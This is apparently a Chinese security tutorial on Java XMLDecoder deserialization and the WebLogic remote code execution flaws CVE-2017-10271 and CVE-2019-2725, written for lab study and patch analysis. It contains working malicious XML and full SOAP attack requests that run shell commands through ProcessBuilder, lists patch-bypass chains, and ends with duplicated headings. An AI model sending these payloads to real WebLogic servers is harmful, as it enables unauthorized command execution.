XMLDecoder反序列化漏洞与Weblogic漏洞分析<\/h1>

1. XMLDecoder\/XMLEncoder基础<\/h2>

1.1 基本概念<\/h3>
XMLDecoder\/XMLEncoder是JDK1.4中添加的XML格式序列化持久性方案，用于表示JavaBeans组件的XML文档：<\/p>
XMLEncoder：生成表示JavaBeans组件的XML文档<\/li>
XMLDecoder：读取XMLEncoder创建的XML文档获取JavaBeans<\/li> <\/ul>
1.2 XMLEncoder示例<\/h3>
import<\/span> javax.swing.*;<\/span>
<\/span><\/span>import<\/span> java.beans.XMLEncoder;<\/span>
<\/span><\/span>import<\/span> java.io.BufferedOutputStream;<\/span>
<\/span><\/span>import<\/span> java.io.FileNotFoundException;<\/span>
<\/span><\/span>import<\/span> java.io.FileOutputStream;<\/span>
<\/span><\/span>
<\/span><\/span>public<\/span> class<\/span> Test<\/span> {<\/span>
<\/span><\/span>    public<\/span> static<\/span> void<\/span> main<\/span>(<\/span>String[]<\/span> args)<\/span> throws<\/span> FileNotFoundException {<\/span>
<\/span><\/span>        XMLEncoder e =<\/span> new<\/span> XMLEncoder(<\/span>
<\/span><\/span>                new<\/span> BufferedOutputStream(<\/span>
<\/span><\/span>                        new<\/span> FileOutputStream(<\/span>"Test.xml"<\/span>)));<\/span>
<\/span><\/span>        e.<\/span>writeObject<\/span>(<\/span>new<\/span> JButton(<\/span>"Hello, world"<\/span>));<\/span>
<\/span><\/span>        e.<\/span>close<\/span>();<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>生成的XML文件：<\/p>
<?xml version="1.0" encoding="UTF-8"?><\/span>
<\/span><\/span><java<\/span> version=<\/span>"1.8.0_112"<\/span> class=<\/span>"java.beans.XMLDecoder"<\/span>><\/span>
<\/span><\/span> <object<\/span> class=<\/span>"javax.swing.JButton"<\/span>><\/span>
<\/span><\/span>  <string><\/span>Hello, world<\/string><\/span>
<\/span><\/span> <\/object><\/span>
<\/span><\/span><\/java><\/span>
<\/span><\/span><\/code><\/pre>1.3 XMLDecoder示例<\/h3>
import<\/span> javax.swing.*;<\/span>
<\/span><\/span>import<\/span> java.beans.XMLDecoder;<\/span>
<\/span><\/span>import<\/span> java.beans.XMLEncoder;<\/span>
<\/span><\/span>import<\/span> java.io.*;<\/span>
<\/span><\/span>
<\/span><\/span>public<\/span> class<\/span> Test<\/span> {<\/span>
<\/span><\/span>    public<\/span> static<\/span> void<\/span> main<\/span>(<\/span>String[]<\/span> args)<\/span> throws<\/span> FileNotFoundException {<\/span>
<\/span><\/span>        XMLDecoder d =<\/span> new<\/span> XMLDecoder(<\/span>
<\/span><\/span>                new<\/span> BufferedInputStream(<\/span>
<\/span><\/span>                        new<\/span> FileInputStream(<\/span>"Test.xml"<\/span>)));<\/span>
<\/span><\/span>        Object result =<\/span> d.<\/span>readObject<\/span>();<\/span>
<\/span><\/span>        System.<\/span>out<\/span>.<\/span>println<\/span>(<\/span>result);<\/span>
<\/span><\/span>        d.<\/span>close<\/span>();<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>1.4 XML文档元素解析<\/h3>

string标签<\/strong>：<string>Hello, World<\/string><\/code><\/li>
object标签<\/strong>：表示对象，class属性指定类，method属性指定方法
<object<\/span> class=<\/span>"javax.swing.JButton"<\/span> method=<\/span>"new"<\/span>><\/span>
<\/span><\/span>  <string><\/span>Hello, world<\/string><\/span>
<\/span><\/span><\/object><\/span>
<\/span><\/span><\/code><\/pre><\/li>
void标签<\/strong>：表示函数调用、赋值等操作
<object<\/span> class=<\/span>"javax.swing.JButton"<\/span>><\/span>
<\/span><\/span>  <void<\/span> method=<\/span>"setText"<\/span>><\/span>
<\/span><\/span>    <string><\/span>Hello, world<\/string><\/span>
<\/span><\/span>  <\/void><\/span>
<\/span><\/span><\/object><\/span>
<\/span><\/span><\/code><\/pre><\/li>
array标签<\/strong>：表示数组，index属性指定数组索引
<array<\/span> class=<\/span>"java.lang.String"<\/span> length=<\/span>"3"<\/span>><\/span>
<\/span><\/span>  <void<\/span> index=<\/span>"1"<\/span>><\/span>
<\/span><\/span>    <string><\/span>Hello, world<\/string><\/span>
<\/span><\/span>  <\/void><\/span>
<\/span><\/span><\/array><\/span>
<\/span><\/span><\/code><\/pre><\/li>
<\/ul>
2. XMLDecoder反序列化漏洞<\/h2>
2.1 漏洞原理<\/h3>
通过XMLDecoder反序列化可控的恶意XML文档可以执行任意代码。<\/p>
2.2 漏洞利用代码<\/h3>
import<\/span> java.beans.XMLDecoder;<\/span>
<\/span><\/span>import<\/span> java.io.BufferedInputStream;<\/span>
<\/span><\/span>import<\/span> java.io.File;<\/span>
<\/span><\/span>import<\/span> java.io.FileInputStream;<\/span>
<\/span><\/span>import<\/span> java.io.FileNotFoundException;<\/span>
<\/span><\/span>
<\/span><\/span>public<\/span> class<\/span> xmlDecodeTest<\/span> {<\/span>
<\/span><\/span>    public<\/span> static<\/span> void<\/span> main<\/span>(<\/span>String[]<\/span> args)<\/span> throws<\/span> FileNotFoundException {<\/span>
<\/span><\/span>        String path =<\/span> "src\/main\/java\/XMLDecoder\/poc.xml"<\/span>;<\/span>
<\/span><\/span>        File file =<\/span> new<\/span> File(<\/span>path);<\/span>
<\/span><\/span>        FileInputStream fis =<\/span> new<\/span> FileInputStream(<\/span>file);<\/span>
<\/span><\/span>        BufferedInputStream bis =<\/span> new<\/span> BufferedInputStream(<\/span>fis);<\/span>
<\/span><\/span>
<\/span><\/span>        XMLDecoder a =<\/span> new<\/span> XMLDecoder(<\/span>bis);<\/span>
<\/span><\/span>        a.<\/span>readObject<\/span>();<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>2.3 恶意XML示例<\/h3>
<?xml version="1.0" encoding="UTF-8"?><\/span>
<\/span><\/span><java><\/span>
<\/span><\/span>    <void<\/span> class=<\/span>"java.lang.ProcessBuilder"<\/span> method=<\/span>"new"<\/span>><\/span>
<\/span><\/span>        <array<\/span> class=<\/span>"java.lang.String"<\/span> length=<\/span>"3"<\/span>><\/span>
<\/span><\/span>            <void<\/span> index=<\/span>"0"<\/span>><\/span>
<\/span><\/span>                <string><\/span>\/bin\/bash<\/string><\/span>
<\/span><\/span>            <\/void><\/span>
<\/span><\/span>            <void<\/span> index=<\/span>"1"<\/span>><\/span>
<\/span><\/span>                <string><\/span>-c<\/string><\/span>
<\/span><\/span>            <\/void><\/span>
<\/span><\/span>            <void<\/span> index=<\/span>"2"<\/span>><\/span>
<\/span><\/span>                <string><\/span>open \/System\/Applications\/Calculator.app\/<\/string><\/span>
<\/span><\/span>            <\/void><\/span>
<\/span><\/span>        <\/array><\/span>
<\/span><\/span>        <void<\/span> method=<\/span>"start"<\/span>\/><\/span>
<\/span><\/span>    <\/void><\/span>
<\/span><\/span><\/java><\/span>
<\/span><\/span><\/code><\/pre>等效Java代码：<\/p>
String[]<\/span> cmd =<\/span> new<\/span> String[<\/span>3<\/span>];<\/span>
<\/span><\/span>cmd[<\/span>0<\/span>]<\/span> =<\/span> "\/bin\/bash"<\/span>;<\/span>
<\/span><\/span>cmd[<\/span>1<\/span>]<\/span> =<\/span> "-c"<\/span>;<\/span>
<\/span><\/span>cmd[<\/span>2<\/span>]<\/span> =<\/span> "open \/System\/Applications\/Calculator.app\/"<\/span>;<\/span>
<\/span><\/span>new<\/span> ProcessBuilder(<\/span>cmd).<\/span>start<\/span>();<\/span>
<\/span><\/span><\/code><\/pre>3. Weblogic漏洞分析<\/h2>
3.1 CVE-2017-10271<\/h3>
3.1.1 环境搭建<\/h4>
使用vulhub中的CVE-2017-10271环境：<\/p>
version<\/span>: '2'<\/span>
<\/span><\/span>services<\/span>:
<\/span><\/span> weblogic<\/span>:
<\/span><\/span>   image<\/span>: vulhub\/weblogic<\/span>
<\/span><\/span>   ports<\/span>:
<\/span><\/span>    - "7001:7001"<\/span>
<\/span><\/span>    - "8453:8453"<\/span>
<\/span><\/span><\/code><\/pre>3.1.2 攻击数据包<\/h4>
POST \/wls-wsat\/CoordinatorPortType HTTP\/1.1
Host: 127.0.0.1:7001
Content-Type: text\/xml
Content-Length: 633

<soapenv:Envelope xmlns:soapenv="http:\/\/schemas.xmlsoap.org\/soap\/envelope\/">
    <soapenv:Header>
        <work:WorkContext xmlns:work="http:\/\/bea.com\/2004\/06\/soap\/workarea\/">
            <java version="1.4.0" class="java.beans.XMLDecoder">
                <void class="java.lang.ProcessBuilder">
                    <array class="java.lang.String" length="3">
                        <void index="0">
                            <string>\/bin\/bash<\/string>
                        <\/void>
                        <void index="1">
                            <string>-c<\/string>
                        <\/void>
                        <void index="2">
                            <string>touch \/tmp\/rai4over<\/string>
                        <\/void>
                    <\/array>
                    <void method="start"\/>
                <\/void>
            <\/java>
        <\/work:WorkContext>
    <\/soapenv:Header>
    <soapenv:Body\/>
<\/soapenv:Envelope>
<\/code><\/pre>
3.1.3 漏洞分析流程<\/h4>

请求到达weblogic.wsee.jaxws.workcontext.WorkContextServerTube#processRequest<\/code><\/li>
数据传入readHeaderOld<\/code>函数<\/li>
通过XMLStreamWriterFactory.create<\/code>获取Payload<\/li>
创建WorkContextXmlInputAdapter<\/code>对象<\/li>
最终在WorkContextXmlInputAdapter#readUTF<\/code>中调用XMLDecoder.readObject<\/code>反序列化<\/li>
<\/ol>
3.1.4 补丁分析<\/h4>
补丁添加了黑名单检查：<\/p>
private<\/span> void<\/span> validate<\/span>(<\/span>InputStream is)<\/span> {<\/span>
<\/span><\/span>   \/\/ ...
<\/span><\/span><\/span><\/span>   if<\/span>(<\/span>qName.<\/span>equalsIgnoreCase<\/span>(<\/span>"object"<\/span>))<\/span> {<\/span>
<\/span><\/span>      throw<\/span> new<\/span> IllegalStateException(<\/span>"Invalid element qName:object"<\/span>);<\/span>
<\/span><\/span>   }<\/span> else<\/span> if<\/span>(<\/span>qName.<\/span>equalsIgnoreCase<\/span>(<\/span>"new"<\/span>))<\/span> {<\/span>
<\/span><\/span>      throw<\/span> new<\/span> IllegalStateException(<\/span>"Invalid element qName:new"<\/span>);<\/span>
<\/span><\/span>   }<\/span> else<\/span> if<\/span>(<\/span>qName.<\/span>equalsIgnoreCase<\/span>(<\/span>"method"<\/span>))<\/span> {<\/span>
<\/span><\/span>      throw<\/span> new<\/span> IllegalStateException(<\/span>"Invalid element qName:method"<\/span>);<\/span>
<\/span><\/span>   }<\/span> else<\/span> {<\/span>
<\/span><\/span>      if<\/span>(<\/span>qName.<\/span>equalsIgnoreCase<\/span>(<\/span>"void"<\/span>))<\/span> {<\/span>
<\/span><\/span>         for<\/span>(<\/span>int<\/span> attClass =<\/span> 0<\/span>;<\/span> attClass <<\/span> attributes.<\/span>getLength<\/span>();<\/span> ++<\/span>attClass)<\/span> {<\/span>
<\/span><\/span>            if<\/span>(!<\/span>"index"<\/span>.<\/span>equalsIgnoreCase<\/span>(<\/span>attributes.<\/span>getQName<\/span>(<\/span>attClass)))<\/span> {<\/span>
<\/span><\/span>               throw<\/span> new<\/span> IllegalStateException(<\/span>"Invalid attribute for element void:"<\/span> +<\/span> attributes.<\/span>getQName<\/span>(<\/span>attClass));<\/span>
<\/span><\/span>            }<\/span>
<\/span><\/span>         }<\/span>
<\/span><\/span>      }<\/span>
<\/span><\/span>      \/\/ ...
<\/span><\/span><\/span><\/span>   }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>3.2 CVE-2019-2725<\/h3>
3.2.1 简介<\/h4>
WebLogic wls9-async反序列化远程命令执行漏洞，影响版本：<\/p>

WebLogic 10.X<\/li>
WebLogic 12.1.3<\/li>
<\/ul>
3.2.2 攻击数据包<\/h4>
POST \/_async\/AsyncResponseService HTTP\/1.1
Host: 127.0.0.1:7001
Content-Type: text\/xml
Content-Length: 1252

<soapenv:Envelope xmlns:soapenv="http:\/\/schemas.xmlsoap.org\/soap\/envelope\/"
                  xmlns:wsa="http:\/\/www.w3.org\/2005\/08\/addressing"
                  xmlns:asy="http:\/\/www.bea.com\/async\/AsyncResponseService">
    <soapenv:Header>
        <wsa:Action>xx<\/wsa:Action>
        <wsa:RelatesTo>xx<\/wsa:RelatesTo>
        <work:WorkContext xmlns:work="http:\/\/bea.com\/2004\/06\/soap\/workarea\/">
            <java version="1.4.0" class="java.beans.XMLDecoder">
                <void class="java.lang.ProcessBuilder">
                    <array class="java.lang.String" length="3">
                        <void index="0">
                            <string>\/bin\/bash<\/string>
                        <\/void>
                        <void index="1">
                            <string>-c<\/string>
                        <\/void>
                        <void index="2">
                            <string>touch \/tmp\/rai4over<\/string>
                        <\/void>
                    <\/array>
                    <void method="start"\/>
                <\/void>
            <\/java>
        <\/work:WorkContext>
    <\/soapenv:Header>
    <soapenv:Body>
        <asy:onAsyncDelivery\/>
    <\/soapenv:Body>
<\/soapenv:Envelope>
<\/code><\/pre>
3.2.3 补丁绕过方式<\/h4>
对于打了补丁的Weblogic，可利用：<\/p>

oracle.toplink.internal.sessions.UnitOfWorkChangeSet<\/code>构造函数进行二次反序列化<\/li>
利用ysoserial-jdk7u21-RCE<\/li>
利用FileSystemXmlApplicationContext-RCE<\/li>
利用JtaTransactionManager链进行JNDI注入<\/li>
<\/ol>
4. 参考资源<\/h2>

https:\/\/www.anquanke.com\/post\/id\/180725<\/li>
https:\/\/www.anquanke.com\/post\/id\/102768<\/li>
http:\/\/xxlegend.com\/2017\/12\/22\/Weblogic%20CVE-2017-10271%20XMLDecoder%20RCE%E5%88%86%E6%9E%90\/<\/li>
http:\/\/balis0ng.com\/post\/lou-dong-fen-xi\/weblogic-wls9-asynczu-jian-rcelou-dong-fen-xi<\/li>
https:\/\/github.com\/lufeirider\/CVE-2019-2725<\/li>
<\/ol>
XMLDecoder反序列化漏洞与Weblogic漏洞分析<\/h1>

1. XMLDecoder\/XMLEncoder基础<\/h2>

2. XMLDecoder反序列化漏洞<\/h2>

2.1 漏洞原理<\/h3> 通过XMLDecoder反序列化可控的恶意XML文档可以执行任意代码。<\/p>

3. Weblogic漏洞分析<\/h2>

3.1 CVE-2017-10271<\/h3>

3.2 CVE-2019-2725<\/h3>

2.1 漏洞原理<\/h3>
通过XMLDecoder反序列化可控的恶意XML文档可以执行任意代码。<\/p>
